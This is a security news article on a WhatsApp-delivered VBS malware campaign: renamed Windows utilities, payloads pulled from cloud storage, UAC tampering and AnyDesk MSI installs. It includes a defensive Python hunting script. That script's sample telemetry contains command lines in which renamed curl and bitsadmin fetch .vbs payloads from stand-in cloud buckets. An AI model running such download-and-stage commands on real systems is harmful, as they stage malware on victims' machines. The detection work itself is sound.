WhatsApp Used to Deliver VBS Malware in Sophisticated Social Engineering Campaign
**Microsoft** is warning of a new social engineering campaign leveraging **WhatsApp** to distribute malicious Visual Basic Script (VBS) files. The attack uses renamed Windows utilities and trusted cloud services to establish persistence and remote access on compromised systems, ultimately deploying malicious MSI packages.

### WhatsApp as a Vector for Malware
**Microsoft** is calling attention to a new campaign that has leveraged **WhatsApp** messages to distribute malicious Visual Basic Script (VBS) files. The activity, which began in late February 2026, uses these scripts to initiate a multi-stage infection chain for establishing persistence and enabling remote access. The specific lures used to trick users into executing the scripts remain unknown.
### Living-off-the-Land Tactics
"The campaign relies on a combination of social engineering and living-off-the-land techniques," the **Microsoft Defender** Security Research Team said. "It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as **AWS**, **Tencent Cloud**, and **Backblaze B2**, and installs malicious **Microsoft** Installer (MSI) packages to maintain control of the system."
The use of built-in tools and trusted platforms lets the threat actors blend into normal host and network activity: execution of a Windows utility and HTTPS egress to well-known cloud storage domains rarely stand out on their own, which increases the likelihood that the chain completes unnoticed.
### Infection Chain
The activity begins with the attackers distributing malicious VBS files via **WhatsApp** messages. When executed, these files create hidden folders in `C:\ProgramData` and drop renamed copies of legitimate Windows utilities such as `curl.exe` (renamed to `netapi.dll`) and `bitsadmin.exe` (renamed to `sc.exe`). Renaming changes only the on-disk name; the binary's version resource still carries its original file name, so a process whose image name disagrees with its `OriginalFileName` (as recorded, for example, in Sysmon process-creation events) is a practical indicator for this stage.

### Persistence and Privilege Escalation
Upon gaining an initial foothold, the attackers aim to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems. This is achieved by downloading auxiliary VBS files hosted on **AWS S3**, **Tencent Cloud**, and **Backblaze B2** using the renamed binaries.
### UAC Bypass and MSI Deployment
"Once the secondary payloads are in place, the malware begins tampering with User Account Control (UAC) settings to weaken system defenses," **Microsoft** said. "It continuously attempts to launch `cmd.exe` with elevated privileges, retrying until UAC elevation succeeds or the process is forcibly terminated, modifying registry entries under `HKLM\Software\Microsoft\Win`, and embedding persistence mechanisms to ensure the infection survives system reboots."
By combining Registry manipulation with UAC bypass techniques, the threat actors gain elevated privileges without further user interaction and go on to deploy unsigned MSI installers. These include legitimate remote-access tools such as **AnyDesk**, which give the attackers persistent remote access and let them exfiltrate data or deploy additional malware. An unsigned MSI installed from a path under `C:\ProgramData` is itself a useful hunting pivot, since Windows Installer records each installation in the Application event log (MsiInstaller events 1033 and 11707 name the product that was installed).
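The three stages above (renamed utilities staged under `C:\ProgramData`, payload pulls from the named cloud storage services, and the UAC prompt retry loop) can be hunted for in process-creation telemetry. The following Python is an added example written for this article, not code from **Microsoft**'s report. It runs over Sysmon-style Event ID 1 records; the records, the hidden folder name `.sys`, the bucket and payload names, and the 30-second burst window are all constructed for the sample. The cloud host suffixes are the public domains of AWS S3, Tencent COS and Backblaze B2; the report does not give the actual hosts used.

```python
"""Hunt helpers for the WhatsApp/VBS chain: renamed Windows utilities staged under
C:\\ProgramData, payload pulls from cloud storage via those utilities, and a burst of
UAC prompts. Input is a list of Sysmon-style process-creation (Event ID 1) records.
All records below are constructed for this example; none are campaign telemetry."""
from collections import deque
from datetime import datetime, timedelta
import ntpath

# Public domains of the three services named in the report (S3, Tencent COS, B2).
CLOUD_HOST_SUFFIXES = ("amazonaws.com", "myqcloud.com", "backblazeb2.com")

# Assumptions for the sample: folder ".sys", bucket "bkt", payloads a.vbs / b.vbs.
EVENTS = [
    {"UtcTime": "2026-03-02 09:00:00", "Image": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\doc.vbs"'},
    {"UtcTime": "2026-03-02 09:00:03", "Image": r"C:\ProgramData\.sys\netapi.dll",
     "OriginalFileName": "curl.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\.sys\a.vbs https://bkt.s3.amazonaws.com/a.vbs"},
    {"UtcTime": "2026-03-02 09:00:04", "Image": r"C:\ProgramData\.sys\sc.exe",
     "OriginalFileName": "bitsadmin.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"sc.exe /transfer j /download https://f000.backblazeb2.com/file/bkt/b.vbs C:\ProgramData\.sys\b.vbs"},
    # Every UAC prompt is a consent.exe launch by the AppInfo service (hosted in svchost.exe);
    # five prompts in twelve seconds is the retry loop seen from the endpoint.
    *({"UtcTime": f"2026-03-02 09:00:{10 + 3 * i:02d}", "Image": r"C:\Windows\System32\consent.exe",
       "OriginalFileName": "consent.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
       "CommandLine": "consent.exe"} for i in range(5)),
    # Legitimate sc.exe: same on-disk name as the renamed bitsadmin, must not be flagged.
    {"UtcTime": "2026-03-02 09:05:00", "Image": r"C:\Windows\System32\sc.exe",
     "OriginalFileName": "sc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "sc.exe query"},
]


def _ts(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")


def _base(path):
    return ntpath.basename(path).lower()


def is_renamed(ev):
    """True when the PE's embedded OriginalFileName disagrees with the on-disk name.
    Compared case-insensitively: cmd.exe legitimately reports 'Cmd.Exe'. Production
    rules should allow-list known benign mismatches before alerting."""
    orig = ev.get("OriginalFileName", "")
    return bool(orig) and orig.lower() != _base(ev["Image"])


def staged_renamed_utilities(events):
    """Renamed binaries living under C:\\ProgramData, paired with their true identity."""
    return [(ev["Image"], ev["OriginalFileName"]) for ev in events
            if is_renamed(ev) and ev["Image"].lower().startswith("c:\\programdata\\")]


def cloud_pulls_by_renamed_downloaders(events):
    """Renamed curl/bitsadmin whose command line targets one of the hosting services."""
    hits = []
    for ev in events:
        if not is_renamed(ev) or ev["OriginalFileName"].lower() not in ("curl.exe", "bitsadmin.exe"):
            continue
        if any(suffix in ev["CommandLine"].lower() for suffix in CLOUD_HOST_SUFFIXES):
            hits.append(ev["OriginalFileName"].lower())
    return hits


def max_uac_prompt_burst(events, window=timedelta(seconds=30)):
    """Largest number of consent.exe launches inside any sliding window; a high count
    means the user is being re-prompted in a loop until they click Yes."""
    times = sorted(_ts(ev) for ev in events if _base(ev["Image"]) == "consent.exe")
    recent, best = deque(), 0
    for t in times:
        recent.append(t)
        while t - recent[0] > window:
            recent.popleft()
        best = max(best, len(recent))
    return best


if __name__ == "__main__":
    print("renamed utilities under ProgramData:", staged_renamed_utilities(EVENTS))
    print("cloud pulls via renamed downloaders:", cloud_pulls_by_renamed_downloaders(EVENTS))
    print("max UAC prompts in one 30s window:", max_uac_prompt_burst(EVENTS))
```

The rename check deliberately keys on the version resource rather than the file name, which is why the legitimate `sc.exe` is not flagged while the renamed `bitsadmin.exe` is; the burst check counts `consent.exe` rather than `cmd.exe`, because a declined elevation never creates the child process but always leaves a prompt behind.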
### Sophisticated Techniques
"This campaign demonstrates a sophisticated infection chain combining social engineering (**WhatsApp** delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting," **Microsoft** said.